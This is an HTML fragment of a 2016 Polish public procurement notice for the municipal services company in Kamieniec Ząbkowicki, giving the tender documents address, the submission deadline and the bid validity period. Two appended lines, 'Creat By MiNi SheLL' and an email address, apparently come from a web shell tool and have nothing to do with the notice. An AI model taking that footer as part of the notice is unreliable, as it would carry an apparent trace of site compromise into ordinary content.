<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kamienieczabkowicki.eu/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Usług Komunalnych 
ul. Złotostocka 4, 57-230 Kamieniec Ząbkowicki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2016 godzina 10:00, miejsce: Zakład Usług Komunalnych 
ul. Złotostocka 4, 57-230 Kamieniec Ząbkowicki
Sekretariat, Ip..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com